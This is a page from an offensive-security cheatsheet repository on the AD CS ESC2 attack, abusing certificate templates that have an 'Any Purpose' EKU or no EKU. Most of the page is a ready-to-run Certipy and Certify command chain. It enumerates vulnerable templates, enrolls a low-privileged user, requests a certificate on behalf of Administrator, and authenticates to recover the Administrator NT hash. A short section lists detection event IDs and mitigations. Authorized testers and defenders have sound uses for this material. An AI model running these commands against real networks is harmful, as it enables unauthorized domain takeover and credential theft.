daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-28-esc2-any-purpose-eku-no-eku.md (4481B)


      1 ---
      2 title: "Attack #28 β€” ESC2 Any Purpose EKU No EKU"
      3 description: "ESC2 exploits certificate templates configured with the \"Any Purpose\" Extended Key Usage (EKU) (OID 2.5.29.37.0) or no EKU at all. Such certificates are…"
      4 category: active-directory
      5 subcategory: "ADCS & Certificates"
      6 tags: ["active-directory", "adcs", "privilege-escalation"]
      7 tools: ["Certipy", "Certify", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Four/🟒 Attack #28 β€” ESC2 Any Purpose EKU No EKU.md"
     11 ---
     12 # 🟒 Attack #28 β€” ESC2: Any Purpose EKU / No EKU
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 ESC2 exploits certificate templates configured with the **"Any Purpose" Extended Key Usage (EKU)** (OID `2.5.29.37.0`) or **no EKU at all**. Such certificates are treated as universal β€” they can function as any EKU, including Client Authentication and Certificate Request Agent. This means a low-privileged user who enrolls for an ESC2-vulnerable certificate can use it as an **Enrollment Agent** to request certificates on behalf of any other user, including Domain Admins.
     19 
     20 ### Vulnerable Template Conditions
     21 
     22 - Template is published/enabled on a CA
     23 - Low-privileged users (Authenticated Users / Domain Users) have enrollment rights
     24 - EKU is set to "Any Purpose" OR is completely empty
     25 - Manager approval is NOT required
     26 - Authorized signatures are NOT required
     27 
     28 ***
     29 
     30 ## βš™οΈ Prerequisites
     31 
     32 | Requirement | Detail |
     33 |---|---|
     34 | **Enrollment rights on ESC2 template** | Domain Users / Authenticated Users can enroll |
     35 | **ADCS deployed** | Certificate Authority must be running |
     36 
     37 ***
     38 
     39 ## πŸ› οΈ Tools
     40 
     41 | Tool | Platform | Notes |
     42 |---|---|---|
     43 | **Certipy** | Linux | `find -vulnerable`, `req` for enrollment |
     44 | **Certify** | Windows | `find /vulnerable`, `request` for enrollment |
     45 
     46 ***
     47 
     48 ## πŸ’» Full Commands
     49 
     50 ### πŸ”΅ Enumerate ESC2 Templates
     51 
     52 ```bash
     53 # ── Certipy ───────────────────────────────────────────────────────────────────
     54 certipy find -u low_user@corp.local -p 'Password1' -dc-ip 10.10.10.10 -vulnerable -stdout
     55 # Look for: [!] Vulnerabilities: ESC2
     56 ```
     57 
     58 ```powershell
     59 # ── Certify ───────────────────────────────────────────────────────────────────
     60 .\Certify.exe find /vulnerable
     61 # Look for templates with "Any Purpose" or empty EKU
     62 ```
     63 
     64 ### πŸ”΄ Exploit ESC2
     65 
     66 ```bash
     67 # ── Step 1: Enroll for the ESC2 certificate ───────────────────────────────────
     68 certipy req -u low_user@corp.local -p 'Password1' -ca CORP-CA \
     69   -template VulnTemplate -dc-ip 10.10.10.10
     70 
     71 # ── Step 2: Use as enrollment agent to request cert as Administrator ──────────
     72 certipy req -u low_user@corp.local -p 'Password1' -ca CORP-CA \
     73   -template User -on-behalf-of 'corp\Administrator' \
     74   -pfx low_user.pfx -dc-ip 10.10.10.10
     75 
     76 # ── Step 3: Authenticate with the Administrator certificate ──────────────────
     77 certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
     78 # Returns NT hash for Administrator
     79 ```
     80 
     81 ```powershell
     82 # ── Certify (Windows) ─────────────────────────────────────────────────────────
     83 .\Certify.exe request /ca:CORP-CA /template:VulnTemplate
     84 # Use resulting cert as enrollment agent for further requests
     85 ```
     86 
     87 ***
     88 
     89 ## πŸ›‘οΈ Detection β€” Event IDs
     90 
     91 | Event ID | Source | What to Look For |
     92 |---|---|---|
     93 | **4886** | Security Log (CA) | Certificate enrollment β€” track low-priv users enrolling for any-purpose templates |
     94 | **4887** | Security Log (CA) | Certificate request approved |
     95 | **4768** | Security Log (DC) | PKINIT TGT request using the forged certificate |
     96 
     97 ***
     98 
     99 ## πŸ”— Attack Chain Context
    100 
    101 ```
    102 [ESC2] ──→ Any Purpose cert β†’ Enrollment Agent β†’ impersonate any user
    103          β”‚
    104          β”œβ”€β”€β†’ πŸ”— Used as stepping stone to ESC3-style enrollment agent abuse
    105          β”œβ”€β”€β†’ πŸ”‘ Low-priv user β†’ DA certificate β†’ domain compromise
    106          └──→ πŸ’€ Defeated by: restrict EKUs, require approval, audit enrollment
    107 ```
    108 
    109 ***
    110 
    111 > βœ… **Attack #28 β€” ESC2 complete.**